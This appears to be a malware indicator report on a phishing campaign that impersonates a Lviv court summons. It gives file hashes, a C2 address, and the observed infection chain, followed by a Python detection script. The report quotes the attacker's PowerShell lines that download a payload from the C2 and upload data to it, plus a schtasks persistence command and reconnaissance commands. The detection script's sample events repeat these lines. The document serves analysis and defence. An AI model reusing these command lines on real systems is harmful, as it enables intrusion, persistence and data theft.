VRad

#script_recon_081123

Nov 8th, 2023 (edited)
#IOC #OptiData #VR #WSH #RAR #SFX #powershell #task

https://pastebin.com/rpFYCNPS

attack_vector
--------------
email attach .rar (sfx) > .lnk > ps > task > Libraries.vbs > connect > recon > exfil


# # # # # # # #
email_headers
# # # # # # # #
Date: Wed, 08 Nov 2023 11:48:25 +0200
Subject: Розсилка процесуальних документів, справа № 623/6341/11, Судова повістка про виклик в суд. [translation: Distribution of procedural documents, case No. 623/6341/11, court summons to appear in court.]
From: СПД 3.9 (Франківський районний суд м.Львова) <spd.1331.ics.gov@ukr.net> [translation of display name: SPD 3.9 (Frankivskyi District Court of Lviv)]

# # # # # # # #
files
# # # # # # # #
SHA-256 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
File name Повiстка-623-6341-11.rar [ WinRAR Self Extracting archive ]
File size 331.92 KB (339886 bytes)

SHA-256 762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378
File name Повiстка-623-6341-11.docx.lnk [ Windows shortcut ]
File size 19.86 KB (20332 bytes)

SHA-256 39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe
File name Libraries.vbs [ WSH ]
File size 747 B (747 bytes)

SHA-256 f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e
File name 623-6341-11.docx [ Microsoft Word 2007+ ]
File size 13.52 KB (13840 bytes)

# # # # # # # #
activity
# # # # # # # #

PL_SCR email_attach

C2 196.196.156[.]2


netwrk
--------------
196.196.156[.]2 196.196.156[.]2:57881 57881 HTTP GET /HcKOAhaZgDePKGKF/page213/upgrade.txt HTTP/1.1
196.196.156[.]2 196.196.156[.]2:49210 49210 HTTP POST /page213 HTTP/1.1

comp
--------------
powershell.exe 916 196.196.156[.]2 57881
powershell.exe 916 196.196.156[.]2 49210

proc
--------------

powershell.exe ...
WINWORD.EXE /n /dde
schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 4 /tr C:\Users\Public\Libraries\Libraries.vbs /f

{another context}

WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
powershell.exe net.webclient;$flm=$iik.
downloaddata ('196.196.156[.]2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');
uploaddata('196.196.156[.]2:49210/page213',$drpy);}
...
whoami.exe
systeminfo.exe
ipconfig.exe
net.exe" view
ROUTE.EXE print -4 -6
RP.EXE -a
NETSTAT.EXE -ant
TRACERT.EXE 8.8.8.8

persist
--------------
\ExplorerCoreUpdateTaskMachine C:\Users\Public\Libraries\Libraries.vbs [task]


drop
--------------
%temp%\623-6341-11.docx
C:\Users\Public\Libraries\Libraries.vbs
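As an added illustration (not part of VRad's paste), the following Python sketch checks process-creation events for the three behaviours recorded under proc and persist above: a schtasks task whose action is a script under a user-writable path and repeats every few minutes, a PowerShell WebClient download/upload against a bare-IP URL, and a burst of discovery tools spawned from one parent. The event layout, field names and the 192.0.2.10 address (documentation range) are assumptions for the example, not data from the paste.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (constructed layout, not a real log format)."""
    image: str     # executable file name
    cmdline: str   # full command line
    parent: str    # parent executable file name


# Script hosts and script extensions a scheduled task should rarely launch.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe")
SCRIPT_EXTS = (".vbs", ".js", ".jse", ".ps1", ".hta", ".bat", ".cmd")
# Locations any user can write to; a task action there deserves a look.
WRITABLE_DIRS = ("c:\\users\\public", "\\appdata\\local\\temp", "c:\\programdata", "\\windows\\temp")
# Host/network discovery tools (set assumed for the example).
RECON_TOOLS = {"whoami.exe", "systeminfo.exe", "ipconfig.exe", "net.exe",
               "route.exe", "arp.exe", "netstat.exe", "tracert.exe"}
WEBCLIENT_VERBS = ("downloaddata", "downloadstring", "downloadfile", "uploaddata", "uploadstring")

RAW_IP_URL = re.compile(r"(?<![\d.])\d{1,3}(?:\.\d{1,3}){3}(?::\d{1,5})?/")
TASK_ACTION = re.compile(r'/tr\s+("[^"]+"|\S+)', re.I)      # value of schtasks /tr
TASK_MODIFIER = re.compile(r"/mo\s+(\d+)", re.I)             # value of schtasks /mo


def task_action(cmdline):
    """Return the /tr action of a schtasks command line, without surrounding quotes."""
    m = TASK_ACTION.search(cmdline)
    return m.group(1).strip('"') if m else None


def check_schtasks(ev):
    """Alerts for task creation with a script action, a writable path, or a fast repeat."""
    cl = ev.cmdline.lower()
    if ev.image.lower() != "schtasks.exe" or "/create" not in cl:
        return []
    action = task_action(ev.cmdline)
    if action is None:
        return []
    a = action.lower()
    head = a.split()[0].split("\\")[-1]          # basename of the first token of the action
    scripty = (a.endswith(SCRIPT_EXTS) or head.endswith(SCRIPT_EXTS)
               or head in SCRIPT_HOSTS or head + ".exe" in SCRIPT_HOSTS)
    alerts = []
    if scripty and any(d in a for d in WRITABLE_DIRS):
        alerts.append(f"schtasks: script action in user-writable path: {action}")
    elif scripty:
        alerts.append(f"schtasks: script host or script file as task action: {action}")
    m = TASK_MODIFIER.search(cl)
    if "/sc minute" in cl and m and int(m.group(1)) <= 5:
        alerts.append(f"schtasks: task repeats every {m.group(1)} minute(s) (beacon-like)")
    return alerts


def check_powershell_webclient(ev):
    """Alert on PowerShell command lines that move data with WebClient, worst when the URL is a bare IP."""
    if ev.image.lower() != "powershell.exe":
        return []
    cl = ev.cmdline.lower()
    verbs = [v for v in WEBCLIENT_VERBS if v in cl]
    if not verbs:
        return []
    if RAW_IP_URL.search(ev.cmdline):
        return [f"powershell: WebClient {'/'.join(verbs)} against a bare IP URL"]
    return [f"powershell: WebClient {'/'.join(verbs)} in command line"]


def recon_bursts(events, threshold=4):
    """Map parent image -> sorted discovery tools for parents spawning >= threshold distinct tools."""
    by_parent = defaultdict(set)
    for ev in events:
        if ev.image.lower() in RECON_TOOLS:
            by_parent[ev.parent.lower()].add(ev.image.lower())
    return {p: sorted(t) for p, t in by_parent.items() if len(t) >= threshold}


def scan(events):
    """Run all checks and return (subject image, alert text) pairs."""
    findings = []
    for ev in events:
        for alert in check_schtasks(ev) + check_powershell_webclient(ev):
            findings.append((ev.image, alert))
    for parent, tools in recon_bursts(events).items():
        findings.append((parent, f"recon burst: {len(tools)} discovery tools: {', '.join(tools)}"))
    return findings


# Constructed sample events modelled on the paste's proc section, plus benign noise.
SAMPLE_EVENTS = [
    ProcEvent("schtasks.exe", "schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 4 "
              "/tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f", "powershell.exe"),
    ProcEvent("WScript.exe", 'WScript.exe "C:\\Users\\Public\\Libraries\\Libraries.vbs"', "svchost.exe"),
    ProcEvent("powershell.exe", "powershell.exe -c $iik=new-object net.webclient;"
              "$flm=$iik.downloaddata('http://192.0.2.10:57881/page213/upgrade.txt');"
              "$iik.uploaddata('http://192.0.2.10:49210/page213',$drpy)", "WScript.exe"),
    ProcEvent("whoami.exe", "whoami.exe", "powershell.exe"),
    ProcEvent("systeminfo.exe", "systeminfo.exe", "powershell.exe"),
    ProcEvent("ipconfig.exe", "ipconfig.exe", "powershell.exe"),
    ProcEvent("NETSTAT.EXE", "NETSTAT.EXE -ant", "powershell.exe"),
    ProcEvent("TRACERT.EXE", "TRACERT.EXE 8.8.8.8", "powershell.exe"),
    ProcEvent("schtasks.exe", 'schtasks.exe /create /TN VendorUpdate /SC daily '
              '/tr "C:\\Program Files\\Vendor\\update.exe"', "msiexec.exe"),
    ProcEvent("powershell.exe", "powershell.exe -c Get-Process | Out-File C:\\temp\\p.txt", "explorer.exe"),
    ProcEvent("ipconfig.exe", "ipconfig.exe /all", "cmd.exe"),
]

if __name__ == "__main__":
    for image, alert in scan(SAMPLE_EVENTS):
        print(f"[{image}] {alert}")
```

The recon-burst check deliberately counts distinct tools per parent rather than raw process count, so a single admin running ipconfig twice does not trip it; the threshold of four is an assumption to tune against your own baseline.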


# # # # # # # #
additional info
# # # # # # # #


# # # # # # # #
VT & Intezer
# # # # # # # #
https://www.virustotal.com/gui/file/86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a/details
https://www.virustotal.com/gui/file/762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378/details
https://www.virustotal.com/gui/file/39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe/details
https://www.virustotal.com/gui/file/f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e/details

VR